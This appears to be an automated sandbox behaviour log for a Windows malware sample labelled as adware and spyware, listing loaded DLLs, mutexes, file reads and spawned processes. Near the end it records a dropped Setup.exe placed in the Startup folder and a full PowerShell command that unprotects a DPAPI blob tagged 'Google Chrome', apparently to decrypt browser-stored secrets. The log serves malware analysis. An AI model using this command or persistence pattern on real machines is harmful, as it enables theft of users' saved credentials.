Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kbdus.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kbdus.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mf.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfplat.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rtworkq.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msmpeg2vdec.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfperfhelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxva2.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msvproc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d12.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d12.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d12core.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxilconv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3dscache.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: twinapi.appcore.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal60.adwa.spyw.winEXE@37/111@4/4
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Setup Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB68.tmp Jump to behavior
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe "C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')
